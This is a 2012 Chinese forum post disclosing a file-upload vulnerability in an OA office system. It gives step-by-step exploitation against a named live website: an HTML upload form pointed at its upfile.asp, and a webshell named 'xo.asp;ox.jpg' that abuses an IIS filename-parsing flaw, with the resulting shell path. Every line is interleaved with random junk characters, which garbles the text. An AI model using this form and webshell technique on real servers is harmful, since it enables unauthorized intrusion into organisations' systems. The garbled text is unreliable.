全能OA办公系统 上传漏洞
" k) H9 b* b! A. x
) m; Y1 t8 q; q系统介绍:
8 y" J; ?0 q [, X& a
8 e' c, ~' ] e5 `全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
8 b& z. `2 ^& F* L! X9 [! }; L3 c e6 W X
主要功能:
: h% J M& S& Y, U# T公司通告 # x# ?* j3 w+ g- y N7 t
工作计划 : v1 z0 ^& [" M E
通讯助理
/ n/ Q+ g+ ?0 h$ f. p客户资源 : F( x C3 P: G% b4 ~8 k* U0 i2 ~' l
我的公文
" T3 Z7 G; a: m; ?公文传阅
' \' P5 c4 L8 f g% W* v% c公共资源
9 D! f* d, B" K# N0 G5 L% m$ L资源预约 . k' ^- `8 H9 a
今日考勤 ! c3 A% ?" }! Y) | Z& b2 g7 m3 z
个人计划
3 S& N3 n) _. S6 S# b个人通讯录
N( z" H" E8 v3 g! V5 S个人基本档案
" |# A7 ?7 a& F0 T* K未读邮件
# G0 J# e; o1 p# l0 Y) q. ~发邮件 5 t# t" w3 b2 ^8 [0 w& l
收件夹
) S4 ]. E6 Z" g! U) b8 M& D- j寄件夹
) z5 W; X- b$ H$ L网络硬盘
, f& K# l2 E& Y网络会议
* b* k* n, k) p! U/ O网络调查
& l; d1 q6 d! j- i0 B4 {交流论坛( u# V+ T' j) w9 H1 P2 C% _; |/ K
( M$ C5 g1 ?4 w$ K; d1 Z
有兴趣测试的朋友可以下源码看看
' R6 Y- X) E$ n3 m$ @" B- p1 j5 W1 [
源码下载:( |" I- m+ k/ D4 e3 w
! q1 H3 [( z7 p' H0 X7 N
http://www.mycodes.net/30/4750.htm' M4 A( R" S" W! c6 u
6 J: D2 @( J4 n5 i; T' o5 b( }* [
漏洞介绍:
5 g ]# k, S* p
4 o8 X& H2 W8 Q g" l$ y& v- G" U由upfile.asp上传文件漏洞引起# Z" H) M" p* F' T9 L
! k+ w+ X1 E S3 z2 @6 G( z- D; D+ u测试方法:
& V w1 f% Z4 e1 \ c
" k: v3 x1 W2 ^; r8 o使用名小子上传http://www.itlynn.com/upfile.asp即可5 v3 [: [! R, g7 T& T* S
5 E2 [0 l r$ X如果upfile.asp文件被删除不存在。8 c* g' E/ ~4 y' _/ Z! T7 i, {9 q
% m% |: B. Y7 F, a4 e2 |/ s9 e
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。" ?7 ~' D( ]) ^4 [( a
8 U0 j! h; W8 l如果存在那么将如下代码保存为upfile.html。3 R" j& C+ l6 Z
+ g- f9 ]% `+ a然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
; c J0 `2 L- l: R( N X g/ ^- ?$ W5 a, H- J3 ~' ?
* J4 x& p' O6 @& K7 V! V6 p# E0 e
g7 A* S# x& X5 x+ @- y. A- @01 <table border='0' align="center" cellpadding="5"> # t8 u" ^2 @: @2 |
6 H2 u: I6 b6 m" H5 e
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
9 h, V4 l; @! f @/ d
3 B! M4 c0 \" p2 b: _03 <tr>
- z7 j9 f9 h; _# {2 h7 o) {+ v3 i0 j2 k. p6 t" W
04 <td>报错:</td> $ H: T, x, q! D; G" e
' \! t" i7 o- Z9 y2 ^9 ]( b3 Q05 <td><input type='radio' name='errnumber' value='0'> * x) }& W6 `) O+ D
& q |3 z, [) Q+ G. a. F- o5 X
06 自动更名 " T: j8 C4 h1 P4 C `
+ n5 K' e& c) _6 i7 Q \2 Y# h+ B' R07 <input type='radio' name='errnumber' value='1' checked>
* J0 o( D: k0 F o; L, ]5 K' s1 y9 a2 T/ E# |* a: M$ g7 ^' m( y
08 报错方式
8 k4 k7 r, ?4 Q. }4 k; R: P2 }% L
: x. q; E [- ]% `6 j1 j09 <input type='radio' name='errnumber' value='2'> . c8 A% Y7 r# t$ N1 x5 |
( `! L4 Q9 }$ J7 f; j
10 直接覆盖</td>
0 x+ p, M5 X" E" O5 ]" e/ G, P3 A- ?' N" {7 g
11 </tr>
0 i( c1 X: t1 J. j# R* y& n
4 v& C5 P4 l, C12 <tr> : E$ S8 T# Q: E1 X3 ^4 V
3 n' n- o- @5 v u& P3 t& N$ Q13 <td>主题:</td>
4 W/ o# [: b" _1 @# h" ^
) E# r7 g2 w- m0 }9 \6 |14 <td><input type='text' name='filename' size='30'></td>
+ n7 I6 i* M- a
2 J+ e8 v* O. [15 </tr>
& X6 m' P$ V0 L2 t2 y/ g! _3 i1 a9 H! q! W" x
16 <tr> 0 C# U- O" X7 k, M
( X, B2 @; Q6 ~$ A. U/ x( D
17 <td>文件:</td>
% ~4 I! [" \# p, m. l. d7 |5 B% Z) G
/ l8 `3 S* [$ b3 `18 <td><input type="file"name="fruit"size="30"></td>
) e2 I' y) S8 N$ O+ \, G+ h0 w: w6 W
& i: y \2 m* A7 ]/ B: n19 </tr>
& Q( x, |6 I+ N% Z# e7 \
3 \5 _% [/ X7 N: w# l20 <tr> + r; j, K$ ?; d8 L6 [
( `) D) ^' P& L& j- L
21 <td valign='top'>简介:</td> 6 l4 d) Z+ l, X, K/ ?
0 m' m l. Z/ J; ]; i5 O+ O22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> / b" \" G5 {) q' }8 H. n
5 ]4 `. r! Y5 l6 x4 m23 </tr>
1 x( A, F5 U/ B9 z4 Q- O
) D% u) [6 H& q3 K24
) N: f/ A: g9 W. S5 N0 {0 g n4 ]' }/ h# d# w
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ; K% v) T! q+ i$ l( B# W |, g9 k
9 J" t; a7 N( U! j; ^; O
26 </tr>
^* e. r1 K+ ]8 ?+ N& }7 e; t1 r+ p) ^& y
27 </form> / i' J) Q/ s) J. {& q
$ @( \, N K9 _然后打开上传一个文件名为xo.asp;ox.jpg的文件。
5 j2 @- T- G2 I. v/ E- q6 j8 o, Y. t. M* ] p7 G5 y/ R
4 S6 e# ]: C4 G- b# C* `% ~
5 z; V% g# C& i% H @上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg( s9 a1 r% ^! _( p
" R$ `" [# p9 _6 v$ V4 P& r- ?
此漏洞需要配合解析漏洞利用。$ a" N- B6 J; T3 ]% g A$ @* x
( o& X; c: S% l* Z! R% @; h' ? |
发表于 2012-11-21 13:45:12
收藏
支持
反对